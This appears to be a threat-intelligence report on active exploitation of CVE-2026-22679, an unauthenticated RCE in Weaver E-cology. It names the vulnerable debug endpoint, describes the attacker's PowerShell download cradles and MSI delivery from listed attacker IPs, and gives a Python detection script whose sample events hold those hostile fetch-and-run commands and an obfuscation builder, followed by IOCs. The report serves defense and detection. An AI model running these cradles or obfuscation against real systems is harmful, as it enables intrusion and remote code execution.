Ping, Payload, PowerShell: Active Exploitation of CVE-2026-22679 in Weaver E-cology
CVE-2026-22679 (CVSS 9.8) is an unauthenticated remote code execution vulnerability in Weaver (Fanwei) E-cology 10.0 builds prior to 20260312, exposed via the debug endpoint POST /papi/esearch/data/devops/dubboApi/debug/method. The attacker-controlled `interfaceName` and `methodName` JSON parameters reach the Dubbo RPC invoker and resolve into command-execution helpers, with no authentication and no input validation. The vendor fix, build 20260312, shipped on 2026-03-12 and removes the debug endpoint entirely. The earliest exploitation observed on a victim host began on 2026-03-17, five days after the patch and 14 days before the first public in-the-wild report on 2026-03-31.
On a compromised, internet-reachable Windows host, every attacker-attributable process was parented by `java.exe` (the Tomcat-bundled JVM that runs E-cology). Activity unfolded in four loose phases over roughly a week. The operator first verified RCE with three sequential `ping.exe -n 1` commands against a Goby-style callback URL on 152.32.173[.]138 in `/U<16hex>.<8hex>` format; the supplied URL is not a valid hostname, so the check worked through the Dubbo debug endpoint's reflected HTTP response body rather than through ICMP. They then attempted three PowerShell DownloadFile cradles: `vsgbt.exe` and `hjchhb.exe` from 205.209.116[.]54:2013, and a Base64-encoded stager that fetched `config.js` from 161.132.49[.]114 and decoded it to disk as `nvm.exe`, impersonating Node Version Manager. All three were quarantined. The operator then pivoted to MSI delivery, downloading `fanwei0324.msi` from 141.11.89[.]42 (the name pairs 泛微, Weaver's Chinese name, with the date of the attempt) and invoking msiexec, but the package produced only a single NamedPipeEvent and no install actions, which suggests a malformed installer.
Within hours the operator abandoned MSI and returned to the original java.exe RCE primitive. They staged a renamed PowerShell interpreter with `cmd /c copy ...\powershell.exe 2.txt`, then issued an obfuscated PowerShell command three times. It combined case randomization (`pOwErsHelL`, `byPaSS`), abbreviated suppressive flags (`-NOprofIl`, `-WIndo HiDden`, `-Nonin`, `-nolOgo`) and a 576-integer character array; `iex` was assembled indirectly through PowerShell variable-substring evasion so the literal `IEX` never appeared on the command line. Decoded, the payload is a clear-text `IEX (New-Object Net.WebClient).DownloadString('http://132.243.172[.]2/config/xx.ps1')`. EDR flagged each attempt, and the operator fell back to running the same DownloadString cradle through the renamed `2.txt` binary, rotating the path to `/w-2026/x.ps1`. Discovery (`whoami`, `ipconfig`, `tasklist`) was interleaved throughout rather than forming a discrete phase, every command parented by java.exe with output returned synchronously in the Dubbo debug endpoint's HTTP response body. The operator never needed a persistent shell: the debug endpoint is the shell.
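Almost everything in the chain above is process-creation telemetry, so the checks the detections below describe can be exercised offline. The Python below is an added example, not the report's or any vendor's detection content: it looks for LOLBin children of java.exe, a PowerShell binary copied to or running under a non-.exe name, case-randomized and abbreviated switches, and `[char[]]` integer arrays that are decoded before the command line is matched for a download cradle. The events are constructed Sysmon-style records that mimic the reported chain; the java.exe path, the msiexec switches, the callback placeholder and the exact shape of the obfuscated command are assumptions, while the URLs are the ones the report lists.

```python
"""Process-creation checks for the java.exe-parented chain described above.

Added example (not the report's or a vendor's detection content). EVENTS are
constructed Sysmon Event ID 1-style records, not real telemetry; JAVA, the
msiexec switches, the callback placeholder and the shape of OBFUSCATED are
assumptions. The URLs are the ones the report lists.
"""
import ntpath
import re

JAVA = r"C:\Weaver\jdk\bin\java.exe"  # assumed E-cology JVM path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://132.243.172.2/config/xx.ps1')"


def to_char_array(s):
    """Encode a string as the [char[]](n,n,...) integer array the obfuscator used."""
    return "[char[]](" + ",".join(str(ord(c)) for c in s) + ")"


# Constructed stand-in for the obfuscated command: 'IEX' and the cradle body are
# built from integer arrays and joined at runtime, so neither appears literally.
OBFUSCATED = (
    'pOwErsHelL -NOprofIl -WIndo HiDden -Nonin -nolOgo -eXeC byPaSS "'
    "$i=[string]::Join(''," + to_char_array("IEX") + ");"
    "$c=[string]::Join(''," + to_char_array(CRADLE[4:]) + ');&$i $c"'
)

EVENTS = [  # parent image, image, OriginalFileName, command line (all constructed)
    dict(name="ping", parent=JAVA, image=r"C:\Windows\System32\PING.EXE", orig="ping.exe",
         cmdline="ping.exe -n 1 callback.invalid"),  # callback host is a placeholder
    dict(name="downloadfile", parent=JAVA, image=PS, orig="PowerShell.EXE",
         cmdline="powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://205.209.116.54:2013/vsgbt.exe','C:\\Windows\\Temp\\vsgbt.exe')\""),
    dict(name="msi", parent=JAVA, image=r"C:\Windows\System32\msiexec.exe", orig="msiexec.exe",
         cmdline="msiexec.exe /i C:\\Windows\\Temp\\fanwei0324.msi /qn"),  # switches assumed
    dict(name="copy", parent=JAVA, image=r"C:\Windows\System32\cmd.exe", orig="Cmd.Exe",
         cmdline="cmd /c copy " + PS + " 2.txt"),
    dict(name="obfuscated", parent=JAVA, image=PS, orig="PowerShell.EXE", cmdline=OBFUSCATED),
    dict(name="renamed", parent=JAVA, image=r"C:\Weaver\2.txt", orig="PowerShell.EXE",
         cmdline="2.txt -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://132.243.172.2/w-2026/x.ps1')\""),
    dict(name="benign", parent=r"C:\Windows\explorer.exe", image=PS, orig="PowerShell.EXE",
         cmdline="powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
]

WEB_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "ping.exe", "msiexec.exe", "whoami.exe",
                "ipconfig.exe", "tasklist.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe"}
PS_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
PS_FLAGS = {"noprofile": "NoProfile", "windowstyle": "WindowStyle", "noninteractive": "NonInteractive",
            "nologo": "NoLogo", "executionpolicy": "ExecutionPolicy", "encodedcommand": "EncodedCommand",
            "command": "Command", "noexit": "NoExit", "file": "File"}
CHAR_ARRAY = re.compile(r"\[char\[\]\]\s*\(\s*([0-9][0-9,\s]*)\)")
COPY_RE = re.compile(r"\bcopy\b\s+\S*powershell\.exe\s+(\S+)", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def decode_char_arrays(cmdline):
    """Return every [char[]](...) integer array on the command line as text."""
    out = []
    for m in CHAR_ARRAY.finditer(cmdline):
        nums = [int(n) for n in re.split(r"[,\s]+", m.group(1).strip()) if n]
        if all(0 <= n < 0x110000 for n in nums):
            out.append("".join(chr(n) for n in nums))
    return out


def flag_findings(cmdline):
    """Case-randomized interpreter name or switches (strong) and abbreviated switches (weak)."""
    strong, weak = [], []
    tokens = cmdline.split()
    exe = ntpath.basename(tokens[0]) if tokens else ""
    if exe.lower() in PS_NAMES and exe not in {exe.lower(), exe.upper(), exe.capitalize(),
                                               "PowerShell", "PowerShell.exe"}:
        strong.append("case-randomized interpreter name " + exe)
    for tok in tokens[1:]:
        if not tok.startswith("-") or len(tok) < 2:
            continue
        name, low = tok[1:], tok[1:].lower()
        matches = [canon for full, canon in PS_FLAGS.items() if full.startswith(low)]
        if not matches:
            continue
        if low not in PS_FLAGS:  # PowerShell accepts any unambiguous prefix of a switch
            weak.append("abbreviated flag " + tok)
        if name not in (low, low.upper(), low.capitalize()) and not any(c.startswith(name) for c in matches):
            strong.append("case-randomized flag " + tok)
    return strong, weak


def analyze(ev):
    strong, weak = [], []
    parent, image = ntpath.basename(ev["parent"]).lower(), ntpath.basename(ev["image"]).lower()
    orig = ev["orig"].lower()
    is_ps = image in PS_NAMES or orig in PS_NAMES
    if parent == "java.exe" and (image in WEB_CHILDREN or is_ps):
        strong.append("LOLBin child of java.exe: " + image)
    if orig in PS_NAMES and image != orig:  # OriginalFileName survives a rename, the path does not
        strong.append("renamed PowerShell binary: " + ev["image"])
    m = COPY_RE.search(ev["cmdline"])
    if m and not m.group(1).lower().endswith(".exe"):
        strong.append("powershell.exe copied to " + m.group(1))
    decoded = decode_char_arrays(ev["cmdline"])
    if decoded:
        strong.append("integer char array(s) decoded: " + " | ".join(decoded))
    text = ev["cmdline"] + " " + " ".join(decoded)  # match on raw and decoded text
    hits = sorted({h.lower() for h in CRADLE_RE.findall(text)})
    if hits:
        strong.append("download cradle: " + ", ".join(hits))
    strong.extend("remote URL " + u for u in URL_RE.findall(text))
    if is_ps:
        s, w = flag_findings(ev["cmdline"])
        strong, weak = strong + s, weak + w
    return {"name": ev["name"], "alert": bool(strong), "strong": strong, "weak": weak}


def run(events=EVENTS):
    return [analyze(ev) for ev in events]


if __name__ == "__main__":
    for r in run():
        print(r["name"], "ALERT" if r["alert"] else "ok", r["strong"], r["weak"])
```

Abbreviated switches are kept as weak signals on purpose: `-nop -w hidden` is common in legitimate scripts, while a case-randomized interpreter name, a `[char[]]` array that decodes to a cradle, or a PowerShell image whose OriginalFileName does not match its file name are each enough on their own when the parent is the web server's JVM.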
IOCs (16)
IP address (5)
- 205.209.116.54
- 161.132.49.114
- 141.11.89.42
- 132.243.172.2
- 152.32.173.138
URL (6)
- http://205.209.116.54:2013/vsgbt.exe
- http://205.209.116.54:2013/hjchhb.exe
- http://161.132.49.114/config.js
- http://141.11.89.42/fanwei0324.msi
- http://132.243.172.2/config/xx.ps1
- http://132.243.172.2/w-2026/x.ps1
SHA256 file hash (1)
- 147ac3f24b2b63544d65070007888195a98d30e380f2d480edffb3f07a78377f
File name (4)
- vsgbt.exe
- hjchhb.exe
- nvm.exe
- fanwei0324.msi
Detections (10)
- PowerShell DownloadFile
- PowerShell Download Cradle Spawned by Web Server Process
- Suspicious PowerShell Execution via Renamed Script or Data Extension
- Msiexec Installing MSI from Web Server Parent
- Detect encoded PowerShell, download cradles, and AMSI bypasses
- Flag heavily obfuscated scripts with long base64 blobs
- Detect cmd.exe spawned by Office apps or with obfuscated arguments
- Detect file downloads from external URLs via LOLBins
- Detect heavily obfuscated command-line arguments
- Flag processes decoding or deobfuscating data using certutil, base64, or XOR operations